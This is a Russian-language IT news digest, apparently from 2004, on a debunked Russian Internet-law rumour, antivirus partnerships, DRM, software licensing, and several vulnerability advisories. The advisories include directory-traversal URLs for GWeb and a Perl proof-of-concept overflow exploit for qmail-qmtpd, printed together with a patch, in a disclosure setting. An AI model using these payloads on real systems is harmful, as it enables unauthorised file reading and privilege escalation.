Заявление для средств массовой информации Российского комитета Программы ЮНЕСКО „Информация для всех“

Заявление для средств массовой информации

Российского комитета Программы ЮНЕСКО „Информация для всех“

На прошлой неделе одно малоизвестное агентство новостей опубликовало сенсационную новость. Согласно сообщению агентства, в России разработан закон „Об интернете“, который, в частности, предусматривает „значительное усиление контроля за деятельностью в интернете, причем, не только интернет-провайдеров, но и пользователей“. Причем законопроект, „разработанный различными ведомствами“, в числе которых назывался МИД, по утверждению агентства, уже „прошел согласование с профильными комитетами Государственной Думы“.

Интернет-сообщество во всем мире болезненно относится к попыткам законодательного регулирования порядка функционирования „сети сетей“, поэтому сенсационное сообщение взволновало российскую интернет-общественность. Некоторые СМИ поспешили сообщить эту новость своим читателям, уснастив ее новыми подробностями. Якобы, законопроект был „согласован … с ЮНЕСКО и ООН“, а „после вступления закона в силу, на то, чтобы работать в сети россиянам придется получать специальное разрешение“.

Разумного читателя должно было насторожить уже само название закона — „Об интернете“, не говоря уже о невнятном содержании сообщения. Бессмысленные по сути фразы, вроде „значительное усиление контроля за деятельностью в интернете“ и „разработанный различными ведомствами“ должны были навести на мысль о том, что автор сообщения даже в руках не держал упомянутый документ. Прочие пассажи, например о готовящемся в Тунисе „всемирном совещании по вопросам интернета“ — речь, вероятно, идет о Всемирном саммите по информационному обществу — иллюстрируют общее понимание автором темы сообщения.

Российский комитет Программы ЮНЕСКО „Информация для всех“ считает необходимым внести некоторую ясность в этот вопрос. Различные проекты и прожекты, призванные урегулировать все и вся, начиная с функционирования Интернет и заканчивая выпадением осадков на территории Российской Федерации, появляются регулярно. Поэтому мы не станем утверждать, что проекта закона „Об Интернете“ не существует в природе.

Вполне вероятно, что подобный законопроект был кем-то написан. Однако, насколько нам известно от наших коллег из Московского бюро ЮНЕСКО, Министерства связи РФ, Министерства иностранных дел РФ, Комитета Государственной Думы по безопасности и других организаций, такой документ не попадал в поле их зрения, не разрабатывался ими и тем более не был ими одобрен.

Советник Комитета Государственной Думы по безопасности РФ Елена Волчинская так прокомментировала сообщение о законопроекте: „Официальное согласование концепции законопроекта осуществляется на этапе подготовки его к первому чтению. Однако подобный законопроект на рассмотрение Государственной Думы не вносился. В Плане законопроектной деятельности Правительства РФ также нет такого законопроекта“. Заместитель председателя Российского комитета Программы ЮНЕСКО „Информация для всех“ Алексей Демидов отметил, что ЮНЕСКО, вопреки сообщению агентства, не выпускала каких бы то ни было рекомендаций, которые бы могли быть использованы при разработке „запретительных“ законов, регулирующих Интернет. Недавно принятые ЮНЕСКО „Хартия о сохранении цифрового наследия“ и „Рекомендация о развитии и использовании многоязычия и всеобщем доступе к киберпространству“, наоборот, призывают максимально расширить и упростить доступ граждан и организаций к Интернет.

Вопрос о том нужно ли регулировать Интернет и если нужно, то как, будет рассматриваться лишь на Тунисском раунде Всемирного саммита по информационному обществу, который пройдет в 2005 году.

Российский комитет Программы ЮНЕСКО „Информация для всех“ понимает, что регулирование Интернета является животрепещущей темой и вызывает большой общественный резонанс. Однако мы рекомендуем СМИ более ответственно относится к распространению сенсационной информации, тем более, что проверить ее не составляет особого труда».

Антивирус Касперского® для Palm OS защитит пользователей FB4

«Лаборатория Касперского», ведущий российский разработчик систем защиты от вирусов, хакерских атак и спама, и американская компания FB4 (www.fb-4.com), специализирующаяся на разработке программных продуктов для защиты вычислительных средств обработки информации, заключили соглашение о начале технологического партнерства.

В рамках партнерства разработчики компании FB4 взяли за основу для своего нового продукта технологию поиска и нейтрализации вредоносных программ, примененную в Антивирусе Касперского® для Palm OS. Проведенное FB4 предварительное тестирование и сравнительный анализ KAV for Palm OS с антивирусными решениями для КПК других компаний выявили значительное технологическое превосходство «Лаборатории Касперского». Это явилось определяющим фактором для FB4 в процессе выбора поставщика антивирусной технологии для своего нового продукта.

FB4 Inc. занимает ведущие позиции на международном рынке средств обеспечения корпоративной и персональной информационной безопасности. Предоставляемые компанией программные продукты охватывают весь спектр компьютерной техники, используемой в современном бизнесе — от смартфонов и карманных компьютеров до ноутбуков и рабочих станций. Решения FB4 также отвечают разнообразию платформ и операционных систем корпоративной IT-инфраструктуры, эффективно функционируя в сочетании с практически любой конфигурацией компьютерной системы. В то же время, портфель продуктов FB4 включает в себя средства защиты персональных компьютеров и техники.

Мощным дополнением пакета программ компании FB4, предназначенных для популярного стандарта карманных компьютеров Palm, стала антивирусная защита, реализованная посредством лицензирования технологии Антивируса Касперского для Palm OS. Новый продукт, получивший название FB4 PalmVirusGuard, приобрел ряд отличий, среди которых измененный интерфейс программы, выполненный в стандартном для решений FB4 стиле, а также поддержка последней версии специальной операционной системы компьютеров Palm — Palm OS5. При этом сохранена функциональность разработки «Лаборатории Касперского», обеспечивающая эффективную защиту от вредоносных программ.

«Одной из основных причин успеха компании FB4 на высококонкурентном рынке средств информационной защиты является уникальный набор взаимодополняющих продуктов, предлагаемых FB4. Это позволяет осуществить внедрение интегрированной системы безопасности в масштабе инфраструктуры бизнес-заказчика, охватывая все ее элементы, включая мобильные смартфоны и карманные компьютеры. Антивирус Касперского для Palm OS стал недостающим элементом концепции компьютерной безопасности FB4. Он обеспечит наших клиентов надежной защитой от вредоносных программ для КПК», — прокомментировал Джордж Тавелл (George Tuvell), совладелец FB4 Inc.

«Несмотря на свое сравнительно недавнее появление, карманные компьютеры стремительно набирают популярность в широких кругах пользователей по всему миру. Более того, КПК становится важным средством корпоративного обмена информацией, особенно среди сотрудников, длительное время находящихся вне офиса. Высокая востребованность этого вида техники имеет и оборотную сторону — КПК все чаще становятся объектом внимания вирусописателей. Мы рады тому, что компания FB4 позаботилась о защите пользователей Palm до того, как операционную среду КПК захлестнет волна вирусов», — отметил Виталий Безродных, Директор по развитию бизнеса «Лаборатории Касперского».

Создан механизм легализации компьютерных программ в органах исполнительной власти

Создан механизм легализации компьютерных программ в органах исполнительной власти - Постановлением от 04.04.2004 за № 253 Кабинет Министров Украины утвердил “Порядок легализации компьютерных программ в органах исполнительной власти”.

Как отмечает в своем сообщении пресс-служба Госдепартамента интеллектуальной собственности, документ впервые на уровне законодательства определил понятие легализации компьютерных программ в органах исполнительной власти. Это – приведение их использования в соответствие с требованиями законодательства об авторском праве путем замены нелицензионных экземпляров компьютерных программ лицензионными.

Действие Порядка не распространяется на закупку нового программного обеспечения либо компьютерной техники с установленными программами.

Согласно Порядку, отныне органы исполнительной власти во время ежегодной инвентаризации программного обеспечения должны подавать перечень и количество экземпляров компьютерных программ, которые необходимо легализировать. После изучения этих данных межведомственная группа во главе с представителем Министерства образования и науки Украины (МОН) будет определять количество экземпляров компьютерных программ, которые подлежат легализации в следующем после инвентаризации году.

На председателя межведомственной группы возлагается проведение предварительных переговоров с правособственниками (лицами, которые имеют исключительное право разрешать использование компьютерных программ), а также представление проектов договоров о легализации на Правительственный комитет социального, научно-технического и гуманитарного развития. На основании заключенных Правительственным комитетом договоров МОН будет организовывать закупку лицензионных экземпляров компьютерных программ.

Компьютерные программы, не подлежащие легализации как морально устаревшие, не соответствующие функциональным задачам органов исполнительной власти, требованиям защиты информации, должны быть выведены из эксплуатации до конца года, в котором проводилась инвентаризация.

Как сообщил заместитель председателя Госдепартамента интеллектуальной собственности МОН Владимир Дмитришин, завершить инвентаризацию этого года предполагается до начала мая. Он высказал надежду, что в ближайшее время органам исполнительной власти удастся перейти на использование исключительно лицензионных компьютерных программ.

Антивирусная фирма F-Secure по ошибке рассылает вирусы

Финская антивирусная компания F-Secure признала, что из-за ошибки одного из сотрудников ее лондонского филиала многим клиентам компании были разосланы письма, зараженные вирусом Netsky.B. Проведенное в компании расследование показало, что зараженное письмо было разослано по всем адресам из корпоративного списка рассылки F-Secure. Источником письма стал зараженный компьютер, принадлежащий одному из подписчиков списка рассылки, но не самой F-Secure.

Получатели списка рассылки имеют право писать в него, но при отправке писем в список необходимо получить подтверждение от сотрудника F-Secure. Так было и в случае с зараженным письмом. Однако сотрудник антивирусной фирмы, ответственный за такие подтверждения, проявил недостаточную бдительность и подтвердил отправку письма с вирусом. К счастью, Netsky.B - это не слишком новый вирус и большинство клиентов компании избежали заражения, так как антивирусные базы уже содержали необходимые обновления.

Тем не менее, в F-Secure назвали происшедшее грубым просчетом. Такое не должно было случиться и никогда не должно повториться, особенно с компанией уровня F-Secure. В истории уже были случаи, когда вирусы рассылались от имени антивирусных компаний. Однако в большинстве случаев вирусописатели специально маскировали заразные послания под сообщения от борцов с компьютерной заразой. Случаи, подобные нынешнему, все же, очень и очень редки.

Технология управления цифровыми правами от HP и Philips

Компании HP и Philips объявили о создании новой системы управления цифровыми правами, предназначенной для ограничения копирования цифровых спутниковых и кабельных телепрограмм. В новой системе реализована поддержка недавно утвержденного Федеральной комиссией США по связи (FCC) стандарта цифровых меток (broadcast flag).

Цифровая метка представляет собой специальную информацию, передаваемую вместе с телепрограммой и устанавливающую правила копирования. С помощью broadcast flag вещатель может полностью запретить копирование телепрограммы, разрешить ее однократную запись без последующего повторного копирования или разрешить свободное переписывание программ.

Для записи программ, передаваемых вместе с цифровыми метками, необходимо использовать специальные диски и рекордеры, в которых имеется разработанная HP и Philips система управления правами. Эти диски стандартов DVD+R, DVD+RW и DVD+R Double Layer будут совместимы как с новым оборудованием, поддерживающим цифровые метки, так и с обычными DVD-плеерами. Однако свободно копировать информацию с таких дисков будет нельзя. Новые диски будут выпускаться по той же технологии, что и обычные перезаписываемые DVD, и их цена не должна сильно превышать цену обычных дисков DVD+R/RW. В перспективе, технология управления цифровыми правами может быть использована и при производстве других цифровых носителей.

Защити ПО, продаваемое через Интернет

Российская компания Protection Technology, разработчик систем защиты тиражируемого ПО, начала продажи пакета StarForce ProActive.

Заложенная в его основу технология основана на предоставлении пользователю уникального серийного номера и позволяет издателям ПО распространять свои Windows-приложения и данные не только на любом оптическом носителе, но и через Интернет, а также контролировать использование приложений и проданных лицензий.

Важно отметить, что для активации приложения (через Интернет, а также по e-mail, телефону или факсу) не требуется наличие лицензионного диска или специального электронного USB-ключа.

Разработчики утверждают, что технология StarForce ProActive предоставляет издателю набор надежных и гибких инструментов, предназначенных для установки защищенных продуктов и контроля обращений к ним на протяжении всего их жизненного цикла.

Благодаря этой новинке издатель ПО может определить желаемую схему использования ПО согласно выбранной модели его продвижения, основанной на времени работы пакета, количестве его активаций и т. д.

Исполнительный директор Protection Technology Герхард Папст отмечает, что решение выпустить технологию StarForce на рынок обусловлено тем фактом, что в мире в целом метод онлайн-распространения коммерческих программных продуктов становится более популярным, чем продажа коробок, содержащих оптические носители.

Так, cогласно прогнозу IDC “Electronic Licensing: the Key to the Future”, выпущенному в октябре 2002 г., уже в 2004 г. доля программ, лицензируемых через Интернет, в натуральном выражении составит 74%, а к 2008-му дойдет практически до 100%.

Популярность онлайн-продаж уже сейчас влияет на уменьшение количества ПО, распространяемого на CD-ROM, и в 2003 г. в мире они по сравнению с 2002-м снизилась с 3275 млн. до 3110 млн. дисков.

Справедливости ради надо отметить, что в нашей стране снижения роста реализации ПО, распространяемого в виде коробочных версий, пока не наблюдается. Наоборот, продажи лицензионных компакт-дисков стремительно увеличиваются. Только фирмой “1С” (см. PC Week/RE, № 8/2004, с. 1) в 2001-м, 2002-м и 2003-м годах “коробочного” софта было продано cоответственно 4; 7 и 10,3 млн. копий.

Однако вернемся к новинке. Подобно всем продуктам семейства StarForce она распространяется через Интернет как самим разработчиком, так и его партнерами (их список можно найти на сайте www.star-force.com/partners/index.html). При этом ее цена сильно зависит от выбранного метода активации ПО, варианта защиты и других параметров.

По мнению менеджера по связям с общественностью Protection Technology Анастасии Кожемякиной, уже в этом году (за счет договоров с пятью-шестью десятками компаний) в мире с помощью технологии StarForce ProActive будет защищено более 1 млн. копий ПО.

На сегодняшний день уже есть договоренности об использовании данной технологии с рядом европейских и китайских издателей программного обеспечения.

Червивый Apple QuickTime

Посвященный безопасности сайт Security Tracker опубликовал сведения о том, что в программном пакете для просмотра мультимедиа-файлов Apple QuickTime обнаружена ошибка, позволяющая удаленному пользователю получить доступ к машине с возможностью запуска программ. Ошибка обнаружена компанией eEye Digital Security. Компании Apple было сообщено об ошибке еще 18 февраля, но патча, исправляющего ошибку, пока нет.

Удаленный отказ в обслуживании против Nortel Wireless LAN Access Point 2200

Программа: Nortel Wireless LAN Access Point 2200 Опасность: Низкая Наличие эксплоита: Нет Описание: Уязвимость обнаружена в Nortel Wireless LAN Access Point 2200. Удаленный пользователь может аварийно завершить работу telnet службы. Удаленный пользователь может послать специально сформированный запрос к 23 порту на целевом устройстве, чтобы аварийно завершить работу telnet службы. URL производителя: http://www.nortel.com/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Nortel Networks Wireless LAN Access Point 2200 DoS + PoC

Повышение привилегий в ignitionServer

Программа: ignitionServer до версии 0.2.1-BRC1 Опасность: Низкая Наличие эксплоита: Нет Описание: Уязвимость обнаружена в ignitionServer. Удаленный авторизованный оператор может получить дополнительные привилегии. Сообщается, что оператор может выполнить недокументированные команды, чтобы добавить себе дополнительные привилегии, включая запуск '/restart' и '/die' команд. Локальный IRC оператор может получить привилегии глобального IRC оператора. URL производителя:http://sourceforge.net/tracker/index.php?func=detail&aid=891555&group_id=96071&atid=613526 Решение:Установите обновленную версию программы: http://sourceforge.net/project/showfiles.php?group_id=96071

A vulnerability was reported in ignitionServer

Удаленный просмотр произвольных файлов в Java-based GWeb server

Программа: GWeb 0.6 Опасность: Средняя Наличие эксплоита: Да Описание: Уязвимость обнаружена в Java-based GWeb server. Удаленный пользователь может просматривать произвольные файлы на системе. Пример/Эксплоит: http://[target]/././././././windows/system.ini http://[target]/./someFile URL производителя:http://www.engr.newpaltz.edu/~keaney70/gweb/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

directory traversal in GWeb 0.6

Локальное переполнение буфера в qmail-qmtpd

Программа: Qmail-qmtpd 1.03 Опасность: Низкая Наличие эксплоита: Да Описание: Переполнение буфера обнаружено в qmail-qmtpd. Локальный пользователь может получить поднятые привилегии. Локальный пользователь может установить RELAYCLIENT переменную окружения к специально сформированному значению, чтобы вызвать переполнение буфера. Пример/Эксплоит: -qma-qmtpd.pl---- #!/usr/bin/perl -w #Copyright Georgi Guninski\nCannot be used in vulnerability databases and #similar stuff use IO::Socket; use IO::Poll; $ENV{"RELAYCLIENT"}="M\$UX"; open(SOCK,"|/var/qmail/bin/qmail-qmtpd"); my $req; my $fromaddr="they\@m\$.weenies"; my $touser="postmaster"; print "qmail-qmtpd buffer overflow. Copyright Georgi Guninski\nCannot be used in vulnerability d atabases and similar stuff\n"; $req = "1:\n,"; $req .= "1:V,"; $req .= "/:"; #biglen - this is how we code '-1' $req .= ",:"; #len - this is how we code '-4' print SOCK $req; my $ch=getc(); $req = "v" x 100000; print SOCK $req; close SOCK; URL производителя: http://www.qmail.org/ Решение:неофициальное исправление: -patch----- --- ./qmail-1.03/qmail-qmtpd.c 1998-06-15 13:53:16.000000000 +0300 +++ qmail-qmtpd.c 2004-02-29 16:15:13.000000000 +0200 @@ -45,8 +45,8 @@ for (;;) { substdio_get(&ssin,&ch,1); if (ch == ':') return len; - if (len > 200000000) resources(); len = 10 * len + (ch - '0'); + if (len > 200000000 || ch < '0' || ch > '9') resources(); } } @@ -193,8 +193,8 @@ substdio_get(&ssin,&ch,1); --biglen; if (ch == ':') break; - if (len > 200000000) resources(); len = 10 * len + (ch - '0'); + if (len > 200000000 || ch < '0' || ch > '9') resources(); } if (len >= biglen) badproto(); if (len + relayclientlen >= 1000) { -----------

Buffer overflow in qmail-qmtpd, yet still qmail much better than windows

Переполнение буфера в Adobe Acrobat Reader

5 марта 2004 Переполнение буфера в Adobe Acrobat Reader Программа: Adobe Acrobat Reader 5.1 Опасность: Средняя Наличие эксплоита: Да Описание: Переполнение буфера обнаружено в Adobe Acrobat Reader в обработке XML форм. Удаленный пользователь может выполнить произвольный код на целевой системе. Удаленный пользователь может сконструировать специально сформированный XML Forms Data Format (XFDF) файл, который, когда будет загружен целевым пользователем, вызовет переполнение стекового буфера и выполнит произвольный код. Пример/Эксплоит: URL производителя: http://www.adobe.com/ Решение:Установите Adobe Acrobat Reader 6.0: http://www.adobe.com/support/downloads/main.html

Adobe Acrobat Reader XML Forms Data Format Buffer Overflow

FreeBSD не свободна от ошибок

Компания iDefense обнаружила в ядре операционной системы FreeBSD ошибку, которая позволяет блокировать работу стека TCP/IP. Удаленный пользователь может послать пакеты для установления TCP-сеанса в неправильной последовательности и тем самым заблокировать все буфера, отводимые ОС для сетевых соединений. После этого система прекращает обработку новых соединений. Исправления для этой ошибки уже разработаны - их нужно скачать с сайта FreeBSD.